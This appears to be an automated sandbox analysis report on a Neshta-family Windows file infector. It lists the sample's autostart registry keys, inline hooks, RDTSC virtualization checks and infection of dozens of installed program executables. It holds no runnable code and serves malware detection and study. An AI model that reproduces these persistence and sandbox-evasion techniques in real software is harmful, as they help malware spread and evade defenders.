          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.com

          Boot Survival:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key Show sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauhJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauhJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000023598E4 second address: 00000000023598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002359B4E second address: 0000000002359B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000E798E4 second address: 0000000000E798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000E79B4E second address: 0000000000E79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe TID: 4404Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeThread delayed: delay time: 30000
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess information queried: ProcessInformation
